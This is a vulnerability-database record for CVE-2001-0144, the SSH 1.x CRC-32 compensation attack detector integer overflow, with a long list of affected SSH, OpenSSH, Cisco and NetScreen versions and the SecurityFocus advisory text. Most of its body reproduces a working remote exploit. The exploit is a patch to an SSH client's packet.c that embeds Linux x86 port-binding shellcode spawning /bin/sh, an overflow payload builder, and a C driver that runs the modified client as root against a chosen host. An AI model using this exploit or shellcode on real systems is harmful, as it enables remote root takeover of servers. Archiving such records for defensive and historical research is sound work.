ID
VAR-E-200102-0016
CVE
cve_id: | CVE-2001-0144 | Trust: 1.6 |
EDB ID
20617
TITLE
SSH 1.2.x - CRC-32 Compensation Attack Detector - Unix remote Exploit
Trust: 0.6
DESCRIPTION
SSH 1.2.x - CRC-32 Compensation Attack Detector. CVE-2001-0144CVE-795 . remote exploit for Unix platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | ssh | model: | - | scope: | eq | version: | 1.2.x | Trust: 1.0 |
vendor: | ssh | model: | communications security ssh | scope: | eq | version: | 1.2.31 | Trust: 0.3 |
vendor: | ssh | model: | communications security ssh | scope: | eq | version: | 1.2.30 | Trust: 0.3 |
vendor: | ssh | model: | communications security ssh | scope: | eq | version: | 1.2.29 | Trust: 0.3 |
vendor: | ssh | model: | communications security ssh | scope: | eq | version: | 1.2.28 | Trust: 0.3 |
vendor: | ssh | model: | communications security ssh | scope: | eq | version: | 1.2.27 | Trust: 0.3 |
vendor: | ssh | model: | communications security ssh | scope: | eq | version: | 1.2.26 | Trust: 0.3 |
vendor: | ssh | model: | communications security ssh | scope: | eq | version: | 1.2.25 | Trust: 0.3 |
vendor: | ssh | model: | communications security ssh | scope: | eq | version: | 1.2.24 | Trust: 0.3 |
vendor: | secure | model: | computing safeword agent for ssh | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | openssh | model: | openssh | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | openssh | model: | openssh | scope: | eq | version: | 2.1.1 | Trust: 0.3 |
vendor: | openssh | model: | openssh | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | openssh | model: | openssh | scope: | eq | version: | 1.2.3 | Trust: 0.3 |
vendor: | openssh | model: | openssh | scope: | eq | version: | 1.2.2 | Trust: 0.3 |
vendor: | netscreen | model: | screenos r2 | scope: | eq | version: | 3.1.1 | Trust: 0.3 |
vendor: | netscreen | model: | screenos r9 | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | netscreen | model: | screenos r2 | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | netscreen | model: | screenos r1 | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | netscreen | model: | screenos r1.1 | scope: | eq | version: | 3.0.3 | Trust: 0.3 |
vendor: | netscreen | model: | screenos r2 | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | netscreen | model: | screenos r5 | scope: | eq | version: | 2.6.1 | Trust: 0.3 |
vendor: | netscreen | model: | screenos r4 | scope: | eq | version: | 2.6.1 | Trust: 0.3 |
vendor: | netscreen | model: | screenos r3 | scope: | eq | version: | 2.6.1 | Trust: 0.3 |
vendor: | netscreen | model: | screenos r2 | scope: | eq | version: | 2.6.1 | Trust: 0.3 |
vendor: | netscreen | model: | screenos r1 | scope: | eq | version: | 2.6.1 | Trust: 0.3 |
vendor: | netscreen | model: | screenos | scope: | eq | version: | 2.6.1 | Trust: 0.3 |
vendor: | cisco | model: | pix firewall | scope: | eq | version: | 5.3(1) | Trust: 0.3 |
vendor: | cisco | model: | pix firewall | scope: | eq | version: | 5.2(5) | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2xq | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2xh | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2xe | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2xd | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2xa | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2t | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 12.2 | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1yf | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1yd | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1yc | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1yb | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1ya | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xy | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 12.1xv | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xu | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xt | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xs | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xr | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xq | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xp | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xm | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xl | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xk | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xj | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xi | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xh | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xg | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xf | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xe | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xd | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xc | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xb | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1xa | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1t | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1ez | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1ey | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1ex | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1ec | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1e | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1dc | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1db | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.10s | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.0s | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | catalyst | scope: | eq | version: | 60006.2(0.110) | Trust: 0.3 |
vendor: | ssh | model: | communications security ssh2 | scope: | ne | version: | 2.4 | Trust: 0.3 |
vendor: | ssh | model: | communications security ssh2 | scope: | ne | version: | 2.3 | Trust: 0.3 |
vendor: | ssh | model: | communications security ssh2 | scope: | ne | version: | 2.2 | Trust: 0.3 |
vendor: | ssh | model: | communications security ssh2 | scope: | ne | version: | 2.1 | Trust: 0.3 |
vendor: | ssh | model: | communications security ssh2 | scope: | ne | version: | 2.0 | Trust: 0.3 |
vendor: | openssh | model: | openssh | scope: | ne | version: | 2.3 | Trust: 0.3 |
vendor: | cisco | model: | webns b11s | scope: | ne | version: | 5.0 | Trust: 0.3 |
vendor: | cisco | model: | webns 1b6s | scope: | ne | version: | 5.0 | Trust: 0.3 |
vendor: | cisco | model: | webns 0b22s | scope: | ne | version: | 4.1 | Trust: 0.3 |
vendor: | cisco | model: | webns 1b42s | scope: | ne | version: | 4.0 | Trust: 0.3 |
vendor: | cisco | model: | pix firewall | scope: | ne | version: | 6.0(1) | Trust: 0.3 |
vendor: | cisco | model: | pix firewall | scope: | ne | version: | 5.3(2) | Trust: 0.3 |
vendor: | cisco | model: | pix firewall | scope: | ne | version: | 5.2(6) | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | ne | version: | 12.2(3) | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2 t | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2 xa | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | ne | version: | 12.2(1.1) | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2 xq | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2 xh | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2 xd1 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1 e | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1 ec3 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1 ez1 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1 ey | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1 yf2 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1 yd2 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1 yc1 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1 yb4 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1 xy6 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | ne | version: | 12.1(5)xv3 | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1 xu1 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1 xr2 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1 xg5 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1 xm4 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1 xt3 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.1 xp4 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.0 s | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | catalyst pan | scope: | ne | version: | 60006.3 | Trust: 0.3 |
vendor: | cisco | model: | catalyst | scope: | ne | version: | 60006.2(0.111) | Trust: 0.3 |
vendor: | cisco | model: | catalyst | scope: | ne | version: | 60006.1(2.13) | Trust: 0.3 |
EXPLOIT
// source: https://www.securityfocus.com/bid/2347/info
Secure Shell, or SSH, is an encrypted remote access protocol. SSH or code based on SSH is used by many systems all over the world and in a wide variety of commercial applications. An integer-overflow bug in the CRC32 compensation attack detection code may allow remote attackers to write values to arbitrary locations in memory.
This would occur in situations where large SSH packets are recieved by either a client or server, and a 32 bit representation of the SSH packet length is assigned to a 16 bit integer. The difference in data representation in these situations will cause the 16 bit variable to be assigned to zero (or a really low value).
As a result, future calls to malloc() as well as an index used to reference locations in memory can be corrupted by an attacker. This could occur in a manner that can be exploited to write certain numerical values to almost arbitrary locations in memory.
This can lead to an attacker executing arbitrary code with the privileges of the SSH server (usually root) or the SSH client.
**UPDATE**:
There have been reports suggesting that exploitation of this vulnerability may be widespread.
Since early september, independent, reliable sources have confirmed that this vulnerability is being exploited by attackers on the Internet. Security Focus does not currently have the exploit code being used, however this record will be updated if and when it becomes available.
NOTE: Cisco 11000 Content Service Switch family is vulnerable to this issue. All WebNS releases prior, but excluding, versions: 4.01 B42s, 4.10 22s, 5.0 B11s, 5.01 B6s, are vulnerable.
Secure Computing SafeWord Agent for SSH is reportedly prone to this issue, as it is based on a vulnerable version of SSH.
** NetScreen ScreenOS is not directly vulnerable to this issue, however the referenced exploit will cause devices using vulnerable versions of the software to stop functioning properly. This will result in a denial of service condition for NetScreen devices. This issue is in the Secure Command Shell (SCS) administrative interface, which is an implementation of SSHv1. SCS is not enabled on NetScreen devices by default.
# Exploit code in the form of ssh client patches by Hugo Dias < bsphere@clix.pt >.
- --- packet.c Sat Oct 14 06:23:12 2000
+++ packet.c Tue Feb 20 09:33:00 2001
@@ -68,6 +68,85 @@
#define DBG(x)
#endif
+
+/*
+ * Linux/x86
+ * TCP/36864 portshell (old, could be optimized further)
+ */
+
+char shellcode[] = /* anathema <anathema@hack.co.za> */
+/* main: */
+"\xeb\x72" /* jmp callz */
+/* start: */
+"\x5e" /* popl %esi */
+
+ /* socket() */
+"\x29\xc0" /* subl %eax, %eax */
+"\x89\x46\x10" /* movl %eax, 0x10(%esi) */
+"\x40" /* incl %eax */
+"\x89\xc3" /* movl %eax, %ebx */
+"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
+"\x40" /* incl %eax */
+"\x89\x46\x08" /* movl %eax, 0x08(%esi) */
+"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
+"\xb0\x66" /* movb $0x66, %al */
+"\xcd\x80" /* int $0x80 */
+
+ /* bind() */
+"\x43" /* incl %ebx */
+"\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */
+"\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */
+"\x88\x46\x08" /* movb %al, 0x08(%esi) */
+"\x29\xc0" /* subl %eax, %eax */
+"\x89\xc2" /* movl %eax, %edx */
+"\x89\x46\x18" /* movl %eax, 0x18(%esi) */
+"\xb0\x90" /* movb $0x90, %al */
+"\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */
+"\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */
+"\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */
+"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
+"\xb0\x66" /* movb $0x66, %al */
+"\xcd\x80" /* int $0x80 */
+
+ /* listen() */
+"\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */
+"\x43" /* incl %ebx */
+"\x43" /* incl %ebx */
+"\xb0\x66" /* movb $0x66, %al */
+"\xcd\x80" /* int $0x80 */
+
+ /* accept() */
+"\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */
+"\x89\x56\x10" /* movl %edx, 0x10(%esi) */
+"\xb0\x66" /* movb $0x66, %al */
+"\x43" /* incl %ebx */
+"\xcd\x80" /* int $0x80 */
+
+ /* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
+"\x86\xc3" /* xchgb %al, %bl */
+"\xb0\x3f" /* movb $0x3f, %al */
+"\x29\xc9" /* subl %ecx, %ecx */
+"\xcd\x80" /* int $0x80 */
+"\xb0\x3f" /* movb $0x3f, %al */
+"\x41" /* incl %ecx */
+"\xcd\x80" /* int $0x80 */
+"\xb0\x3f" /* movb $0x3f, %al */
+"\x41" /* incl %ecx */
+"\xcd\x80" /* int $0x80 */
+
+ /* execve() */
+"\x88\x56\x07" /* movb %dl, 0x07(%esi) */
+"\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */
+"\x87\xf3" /* xchgl %esi, %ebx */
+"\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */
+"\xb0\x0b" /* movb $0x0b, %al */
+"\xcd\x80" /* int $0x80 */
+
+/* callz: */
+"\xe8\x89\xff\xff\xff" /* call start */
+"/bin/sh";
+
+
/*
* This variable contains the file descriptors used for communicating with
* the other side. connection_in is used for reading; connection_out for
@@ -125,6 +204,9 @@
/* Session key information for Encryption and MAC */
Kex *kex = NULL;
+/* Packet Number */
+int count = 0;
+
void
packet_set_kex(Kex *k)
{
@@ -461,6 +543,8 @@
unsigned int checksum;
u_int32_t rand = 0;
+ count++;
+
/*
* If using packet compression, compress the payload of the outgoing
* packet.
@@ -1172,7 +1256,64 @@
void
packet_write_poll()
{
- - int len = buffer_len(&output);
+ int len;
+ char buf[50],*p,*ptr;
+ char code[270000];
+ long sz;
+ FILE *f;
+
+ if (count == 2)
+ {
+ f = fopen("/tmp/code","r");
+ fgets(buf,28,f);
+ fclose(f);
+
+ sz = GET_32BIT(&buf[24]);
+ buffer_clear(&output);
+ buffer_append(&output,code,sz);
+
+ len = buffer_len(&output);
+
+ ptr = buffer_ptr(&output);
+
+ for(p = ptr + 4 ; p < ptr + GET_32BIT(&buf[16]) ; p+=8)
+ {
+ *p=buf[0];
+ *(p+1)=buf[1];
+ *(p+2)=buf[2];
+ *(p+3)=buf[3];
+ *(p+4)=buf[4];
+ *(p+5)=buf[5];
+ *(p+6)=buf[6];
+ *(p+7)=buf[7];
+ }
+
+ sz = ((GET_32BIT(&buf[20]) + 8) & ~7);
+
+ for(p = p ; p < ptr + sz ; p+=8)
+ {
+ *p=buf[8];
+ *(p+1)=buf[9];
+ *(p+2)=buf[10];
+ *(p+3)=buf[11];
+ *(p+4)=buf[12];
+ *(p+5)=buf[13];
+ *(p+6)=buf[14];
+ *(p+7)=buf[15];
+ }
+
+ sz = len - GET_32BIT(&buf[20]);
+
+ memset(p,'\x90',sz);
+ memcpy(p+sz-strlen(shellcode)-16,&shellcode,strlen(shellcode));
+ memcpy(ptr,&buf[20],4);
+
+ count++;
+ }
+
+ len = buffer_len(&output);
+
+
if (len > 0) {
len = write(connection_out, buffer_ptr(&output), len);
if (len <= 0) {
@@ -1299,3 +1440,4 @@
max_packet_size = s;
return s;
}
+
- ------------------------------------------------------------------------------------
/*
THIS FILE IS FOR EDUCATIONAL PURPOSE ONLY.
BlackSphere - Hugo Oliveira Dias
Tue Feb 20 16:18:00 2001
Email: bsphere@clix.pt
Homepage: http://planeta.clix.pt/bsphere
Exploit code for using the modified ssh
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
/* Path to modified ssh */
#define PATH_SSH "./ssh"
int main(int argc,char *argv[])
{
int f;
int port;
unsigned long addr,*ptr;
char *buffer,*aux,ch,*ssh;
int i;
if (argc < 8)
{
printf("\nUsage : %s <saved eip> <count> <packet length> <username length> <host> \
<port> <h(i)>\n\n",argv[0]);
fflush(stdout);
_exit(0);
}
port=atoi(argv[6]);
buffer = (char *) malloc(29);
ptr = (unsigned long *) buffer;
*(ptr++) = 1543007393 + strtoul(argv[1],0,10);
*(ptr++) = 0;
*(ptr++) = strtoul(argv[7],0,10);
*(ptr++) = 0;
*(ptr++) = 16520 + strtoul(argv[2],0,10);
*(ptr++) = strtoul(argv[3],0,10);
*(ptr++) = strtoul(argv[4],0,10);
buffer[29]=0;
for(i = 0 ; i < 27 ; i+=4)
{
aux = buffer + i;
ch=*aux;
*aux=*(aux+3);
*(aux+3)=ch;
ch=*(aux+1);
*(aux+1)=*(aux+2);
*(aux+2)=ch;
}
printf("\nSaved Eip : &h + %u",1543007393 + strtoul(argv[1],0,10));
printf("\nReturn Address : 0x%xxxxx",(16520+strtoul(argv[2],0,10))/8);
printf("\nPacket Length : %u",(strtoul(argv[3],0,10)+8) & ~7);
printf("\nUsername Length : %u\n\n",strtoul(argv[4],0,10));
fflush(stdout);
f = open("/tmp/code",O_RDWR | O_CREAT,S_IRWXU);
write(f,buffer,28);
close(f);
ssh = (char *) malloc(strlen(PATH_SSH) + 100 + strlen(argv[5]));
strcpy(ssh,PATH_SSH);
sprintf(ssh+strlen(PATH_SSH)," -p %i -v -l root %s",port,argv[5]);
printf("%s\n",ssh);
system(ssh);
_exit(0);
}
Trust: 1.0
EXPLOIT LANGUAGE
c
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
CRC-32 Compensation Attack Detector
Trust: 1.0
CREDITS
Michal Zalewski
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 20617 | Trust: 1.9 |
db: | BID | id: | 2347 | Trust: 1.9 |
db: | NVD | id: | CVE-2001-0144 | Trust: 1.6 |
db: | EDBNET | id: | 42757 | Trust: 0.6 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2001-0144 | Trust: 1.6 |
url: | https://www.securityfocus.com/bid/2347/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/20617/ | Trust: 0.6 |
url: | http://www.netscreen.com/index.html | Trust: 0.3 |
url: | http://www.netscreen.com/support/alerts/11_06_02.html | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/20617 | Trust: 0.3 |
url: | http://support.coresecurity.com/impact/exploits/56f46f9564b53fc1bca5bef469b60df7.html | Trust: 0.3 |
url: | http://www.cisco.com/warp/public/707/ssh-multiple-pub.html | Trust: 0.3 |
SOURCES
db: | BID | id: | 2347 |
db: | EXPLOIT-DB | id: | 20617 |
db: | EDBNET | id: | 42757 |
LAST UPDATE DATE
2022-07-27T09:34:35.002000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 2347 | date: | 2001-02-08T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 2347 | date: | 2001-02-08T00:00:00 |
db: | EXPLOIT-DB | id: | 20617 | date: | 2001-02-08T00:00:00 |
db: | EDBNET | id: | 42757 | date: | 2001-02-08T00:00:00 |